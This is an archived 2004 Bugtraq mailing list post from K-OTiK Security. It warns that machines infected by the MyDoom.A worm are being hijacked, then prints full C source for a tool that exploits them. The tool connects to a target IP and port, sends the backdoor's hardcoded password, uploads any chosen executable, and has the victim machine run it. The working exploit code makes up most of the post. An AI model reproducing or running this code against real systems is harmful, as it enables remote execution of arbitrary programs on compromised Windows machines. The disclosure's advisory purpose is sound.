[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040210154906.28708.qmail@www.securityfocus.com>
Date: 10 Feb 2004 15:49:06 -0000
From: K-OTiK Security <Special-Alerts@...tik.com>
To: bugtraq@...urityfocus.com
Subject: MyDoom.A Machines : The new P2P Sharing Network ...
As you know MyDoom.A machines are exploited by MyDoom.C and Vesser - There is a faster and more dangerous worm exploiting these machines : his name is "kiddies" !!
so here is one of the codes used by hax0rz to exploit Mydoom.A machines (many other codes in the wild)
Regards.
Fabien // K-OTik Staff
http://www.k-otik.com
// MyDoom.A Upload/Exec Backdoor
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma lib <ws2_32.lib>
int main(int argc,char *argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
char doompassword[] = "\x85\x13\x3c\x9e\xa2";
char buf[1024];
int read=0;
FILE *fuckfile;
WSADATA wsaData;
if(argc<3)
{
printf("***************************************************\n");
printf("***** MyDoom.A Upload/Exec Backdoor*****\n");
printf("**** Usage: %s <ip> <port> <program to upload> ****\n", argv[0]);
printf("***************************************************\n");
return -1;
}
printf("[+] Opening File\n");
fuckfile = fopen(argv[3],"rb");
if (fuckfile==NULL) {
printf("[-] Open Failed\n");
return -1;
}
printf("[+] File found ready to send\n");
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.\n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting error\n");
return -1;
}
printf("[+] Connected\n[+] Sending executable.\n");
send(sockfd,doompassword,5,0); //sending the password :)
while (!feof(fuckfile)) {
read = fread(buf,sizeof(char),sizeof(buf),fuckfile);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return -1;
}
printf(".");
}
printf("[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 0;
}
Powered by blists - more mailing lists